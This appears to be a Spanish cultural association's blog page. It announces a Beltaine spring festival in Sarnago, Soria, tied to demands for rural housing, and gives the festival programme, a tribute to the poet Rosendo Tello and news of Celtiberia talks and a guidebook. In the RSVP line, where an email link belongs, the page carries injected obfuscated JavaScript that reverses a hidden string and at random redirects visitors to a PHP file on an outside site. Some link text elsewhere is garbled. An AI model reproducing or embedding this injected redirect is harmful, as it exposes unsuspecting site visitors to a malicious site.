Entradas

SARNAGO, “LA ALDEA GALA” DE TIERRAS ALTAS DE SORIA CELEBRA BELTAINE

EL SÁBADO 30 DE ABRIL LA FIESTA SE MEZCLARÁ CON LA REIVINDICACIÓN DE VIVIENDAS EN LA ESPAÑA RURAL 

Convocan:   Asociación de Amigos de la Celtiberia y Asociación de Amigos de Sarnago.

    Colaboran Diputación de Soria y Ayto de San Pedro Manrique.

Los resistentes de Sarnago han sido capaces de una hazaña comparable a la de Asterix. No vencieron a los romanos, pero sí a la ruina que amenazaba su pueblo sentenciado por el ICONA en la década de 1950. La Asociación de Amigos de Sarnago ha sido fundamental en este empeño sostenido desde hace cuarenta años. Ahora, tras dos largos años de triste pandemia, el exorcismo revivificador se llama Beltaine, la fiesta de la primavera de la civilización céltica que luego fueron asimiladas por los “mayos” y otros ritos en la cultura rural tradicional, revivirán en las Tierras Altas de Soria. Música, camaradería, comidas, danza, libros, conferencias, ritos y diversión estarán presentes otro año en otra aldea que pondremos en el mapa durante al menos un día… Los organizadores, Asociación de Amigos de Sarnago y Asociación de Amigos de la Celtiberia, quieren también añadir un sentido reivindicativo a la celebración. Los indicadores que radiografían el estado de los territorios la antigua Celtiberia son de sobra conocidos y apuntan hacia el colapso. No queremos hacer más retórica con esto. Sobran palabras y faltan hechos. Por eso apostaremos por una revitalización rural que empieza con la disponibilidad de viviendas, que será el leitmotiv reivindicativo de esta jornada festiva y que se tratará en una sesión.Por eso, simbólicamente vamos a plantar un roble en la dehesa, a la manera de los tradicionales mayos que pretendían fecundar la tierra y propiciar buenas cosechas. Ahora no necesitamos trigo, necesitamos gente y casas para los que vengan.

Todos aquellos que quieran sumarse a la fiesta, siempre reivindicativa, están invitados. La hospitalidad celtíbera está a prueba de todo y no faltará un trozo de carne (el jabalí de Asterix será cordero) y un buen vaso del vino de la Celtiberia.

Beltaine

Las celebraciones comenzaban con la Noche de Walpurgis, encendiéndose hogueras que se apagaban al día siguiente (Beltaine) para encender un simbólico fuego nuevo. Esa noche, en la que como en la que precede a Samhain (la otra gran festividad celta del 1 de noviembre ahora divulgada desde el Imperio como Halloween) vagaban los espíritus, ha sido advocada frecuentemente por el cine de terror. Beltaine (1 de mayo) es una fecha simbólica, fundamental en el calendario celta (más perfecto todavía que el actual gregoriano, como prueba el bronce de Coligny) en el centro de la “Edad del Roble”. Las celebraciones giraban en torno a la naturaleza, ya que la religión celta tenía un preponderante sesgo panteísta.

Estos cultos a la Naturaleza (La Fuente de Vida, la Fuente de Todas las Cosas) fueron recreados con potente sentido mítico en El Druida, de Morgan Llyvelyn, quien pone en boca de Anvar estas palabras:

Más tarde descubriría que los romanos afirmaban que adorábamos a los árboles, pero los romanos sólo ven la superficie de las cosas. Los druidas no adoramos a los árboles, sino que adoramos entre los árboles y con los árboles. Todos juntos adoramos a la Fuente”.

También han quedado testimonios históricos de estas celebraciones primaverales, como éste recogido por John Ramsay en las Islas Británicas durante el siglo XVI:

 “igual que el otro culto público de los druidas, la fiesta de Beltane, creemos que se ejecutaba sobre collados y cerros. Ellos pensaban que era degradante para aquel cuyo templo es el universo, suponer que morase en cualquier casa hecha con las manos. Por esta razón los sacrificios eran ofrendados al aire libre, con frecuencia sobre las cimas de las colinas, donde se les ofrecía el panorama más grandioso de la naturaleza y donde estaban más cercanos a la sede el calor y el orden”.

Tugaimid cuireadh duit ceiliúradh a dhéanamh ar an mBealtáin i bráithreachas agus i síocháin le pobail Cheilteacha uile an domhain

Os invitamos a celebrar Beltane en hermandad y paz con todos los pueblos celtas del mundo

PROGRAMA DE ACTOS.

Sábado, 30 de abril

11’00-11’30 horas:  Recepción de participantes en la plaza del pueblo.

11’30 horas: Debate sobre la vivienda en la Celtiberia rural: medidas para la revitalización, conducido por Ángel Muñoz (AAC) y José María Carrascosa (AAS). Plaza del pueblo (si lloviera se trasladaría, como otros actos, a la escuela-museo).

12’45 horas: Visitas guiada a los hitos principales. Culminará en el castro celtibérico de El Castillo, donde se recitará un poema en gaélico en recuerdo de nuestra vieja lengua céltica.

14’00-16’00 horas: Comida de hospitalidad entre celtíberos

Sobremesa amenizada por música

17’00 horas:  Presentación de la Guía Turística de la Celtiberia y de las cartillas de los celtíberos a cargo de la AAC.

18.00 h. «¿Cuándo comienza la primavera?», Javier Sanz compartirá esta breve disertación con el público

18.30 h. Acto de magia y abrazo de la naturaleza en la dehesa (németon local) a cargo de los y las druidas. Se plantarán robles melojos entorno a un mayo.

19’30 horas: La hora de los bardos: recital poético, narrativo y musical (Trasnochos)

21.00 horas: Se activan las hogueras de Walpurgis bendecidas por los hombres y mujeres mágicos en presencia de la tribu.

21’30 horas: Banquete nocturno de hermanamiento ofrecido por la Asociación de Amigos de Sarnago

23’00 horas:  Celebración de luz y el estallido de vida primaveral en la hoguera de la Noche de Walpurgis. Música, danza, caelia y otros brebajes en hermandad celtibérica.

Actuación del grupo soriano Trasnochos con música celtibérica.

Convendría que dejarais constancia de cuántas personas vais a venir en:  $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to:sarnago@sarnago.com»>sarnago@sarnago.comHabrá espacio para acampada y estacionamiento de caravanas

Rosendo Tello, poeta celtíbero.

Rosendo Tello es un poeta, y de esa condición básica, que es actitud fundamental ante la vida, derivan su visión panorámica y su ductilidad verbal. Encuentra a esa palabra la docilidad necesaria para ser dicha desde la atalaya de la edad que legítimamente le concede un cuerpo donde resistir los embates biológicos, pero, sobre todo, le concede los instrumentos propios del arte de la palabra para decir, no para describir (que, en sus circunstancias, acaso sería para él lo más fácil). Pero lo más importante, a mi juicio, es que la obra telliana es ejemplo incuestionable del hombre que se conoce a sí mismo y se desarrolla en la acción. Tello no se agota inútilmente en la introspección psicológica; diría más: yo creo que siente horror a los espíritus meramente especulativos. Teme perderse en nebulosas y huye de las ideas puras para cobijarse en su realidad más objetiva y tangible. Sin embargo, se siente seguro entre esos hitos, en el reconocimiento puro, sencillo y natural de su edad. Y desde esta serenidad deriva muy probablemente su crear incesante para aumentar la belleza y el valor de la vida, para embellecer una memoria anclada incuestionablemente en la tierra de la que procede, en el límite sur de la Celtiberia donde reside su entorno familiar: el huerto, el monte, el gallo “Rufo”, el padre que hablaba con los árboles, esa infancia, en fin, que no ha dejado de asistirle durante toda su vida y a través de la cual ha peregrinado en todas y cada una de las edades del Rosendo hombre, dialogador hegeliano, árbol él mismo mágico y fecundo, hontanar semántico y verbo corregidor del secano.

Su obra es un sólo libro lleno de luz, iluminado por su palabra. Su obra luce de policromías y es ahora cuando unos cuantos y escogidos amigos muy cercanos le rendimos un homenaje reparador que quiere ser, a su vez, una llamada de atención para la olvidadiza exégesis de la literatura española contemporánea.

Gracias a Luis Felipe Alegre – Chusé Aragüés – Javier Barreiro – Carlos Bozalongo – Adolfo Burriel -Borque – Antón Castro – Mariano Castro – José Antonio Conde – José Luis Corral -Juan Domínguez Lasierra – Javier Fernández López – Ángel Guinda – José Carlos Mainer – Manuel Martínez-Forega – José Luis Melero – Emilio Quintanilla Buey – Inés Ramón – Trinidad Ruiz Marcellán – Rosendo Tello Aína – José Verón Gormaz – Miguel Ángel Yusta y a los ilustradores Tomás Roures, Miguel Ángel Dom´ínguez, Josian Pastor y Berna Martínez-Forega, autora, además, de la fotografía de cubierta.

mainar-jornadas-celtiberia

Mainar acoge la última jornada de esta edición

El pasado 28 de agosto, se acercaron hasta Mainar la vicepresidenta de la Comarca de Daroca, y alcaldesa de Mainar, Lina Peinado, y el consejero de cultura, Pedro Luis Aparicio para clausurar la edición de este año. Las jornadas divulgativas sobre la Celtiberia, dentro del programa Huellas del Pasado, se han podido celebrar a lo largo de nueve sábados. 

Leer más
villanueva-jiloca-mujer-celtibera

tonio Chaín aproxima el papel de la mujer celtíbera'>Antonio Chaín aproxima el papel de la mujer celtíbera

El pasado sábado 21 de agosto Villanueva de Jiloca acogió la penúltima charla de las Jornadas Formativas sobre la Celtiberia. En la cual Antonio Chaín, del equipo arqueológico de Numancia, abordó distintos aspectos de la mujer celtibérica.

Leer más
badules-fiesta-celtiberica

Badules celebra su ya tradicional Fiesta Celtibérica

Badules celebra su tradicional Fiesta Celtibérica, tras ya 11 ediciones no consecutivas ya que el año pasado no pudo realizarse. Este año se ha querido continuar con la misma dentro de las Jornadas de “Huellas del Pasado” impulsadas por la Comarca de Daroca. Su celebración se ha limitado a la conferencia impartida por Luis Alberto Gonzalo y se ha centrado en la minería y la producción industrial.

Leer más
jornada-celtiberia-villaroya-campo

toriador Javier Hernández'>La arte celtíbero de la mano del historiador Javier Hernández

El pasado 7 de agosto se celebró el primer evento del mes, continuando con las Jornadas Formativas sobre la Celtiberia, con el arte celtibérico como protagonista a cargo de Javier Hernández Ruiz. El municipio encargado de acoger la sesión fue Villarroya del Campo.

Leer más
jornada-celtiberia-villareal-huerva

Continúan las Jornadas Formativas sobre la Celtiberia en Villareal de Huerva

El día 10 de julio, continuando con el programa de divulgación “Huellas del pasado”, en la que se muestran distintos aspectos de la vida de los Celtíberos, tuvo lugar la clase sobre las comunicaciones.

Leer más
jornada-celtiberia-herrera-navarros

Herrera de los Navarros anfitriona de la inauguración de las Jornadas Formativas de la Celtiberia

El pasado día 3 de julio dio comienzo la nueva edición de las Jornadas Formativas sobre la Celtiberia. Una serie de charlas didácticas con una mirada a la Historia Celtíbera bajo el lema “Huellas del pasado” patrocinadas por la Comarca Campo de Daroca. De esta manera, se avanza en el programa, iniciado en el verano de 2020, en el que se fueron recorriendo varios pueblos divulgando distintos aspectos de la cultura celtibérica, de la que esta comarca dispone varios restos arqueológicos. 

Leer más

Por qué la Celtiberia es la gran desconocida del patrimonio ecocultural en Europa… Descúbrelo

https://aragondocumenta.com/secretos-de-la-celtiberia/

La guía que situará a la Celtiberia en el mapa

bdr

Próximamente la editoriaL aragonesa PRAMES lanzará la primera Guía de la Celtiberia. Un país imaginado, coordinada por Javier Hernández Ruiz, miembro de nuestra asociación, como muchos de los que han colaborado como especialistas en los distintos capítulos: Ángel Muñoz (geografía), Alberto Gonzalo, Marta Chordá y Gabriel Sopeña (arqueología), José Luis Corral y Miguel Ángel Dolado (Historia), Vicente Checa (Etnografía), Rafael Yuste (Arte), Manuel M. Forega, Jesús Rubio y Jose Verón (Literatura), Carmelo Romero (personajes), Chabier de Jaime (Naturaleza), etc. Es una guía ilustrada, muy icónica y dinámica, dotada de mapas con rutas que servirán para valorizar el enorme patrimonio ecocultural del «País de las Cuatro Culturas», cuya condición fronteriza a lo largo de la Historia ha deparado esta riqueza mestiza. Es la Celtiberia un horizonte por descubrir que resultará especialmente estimulante a ese viajero amante de la cultura, la etnografía y la naturaleza que, tras la pandemia, quiere descubrir el revalorizado paisaje de la España despoblada. La Celtiberia es un país ideal para recorrer con los ojos de la imaginación: las sorpesesas son inagotables.